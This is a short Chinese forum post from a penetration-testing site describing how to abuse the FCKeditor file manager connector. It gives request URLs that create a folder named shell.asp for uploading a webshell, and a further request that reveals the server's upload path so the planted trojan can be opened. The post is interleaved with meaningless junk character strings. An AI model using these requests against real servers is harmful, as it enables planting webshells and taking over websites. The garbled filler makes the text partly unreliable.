中国网络渗透测试联盟
标题:
fckeditor找上传路径方法
[打印本页]
作者:
admin
时间:
2013-10-17 19:37
标题:
fckeditor找上传路径方法
网上流行着是上传是这样子的
' e0 B( \+ F: e5 t7 F
) ]$ [3 s0 c: w4 E8 R
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
" n# J% A! P7 `' |' |( q( V3 V8 t
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
% Q5 a G6 f4 D
8 t: b0 f- m1 I* h
上传后老找不到路径,测了一下,我发现
5 k+ ?, K6 h& }# ^
* \1 P7 `0 b' l7 A' y
FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
( o' ^5 e$ M8 `
5 ~! s* Q6 |) A, \0 z' O
可以爆出路径,显示以下内容
8 q& v, r. b4 y; o- g+ _" t
- w. A2 ]: l8 ~, q8 ~) b+ L) X
" J) q& n7 z6 F* O- g/ ]
得出路径,直接打开就见到马子
5 `8 T6 w' g9 T. |7 ?0 P5 ?% D
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2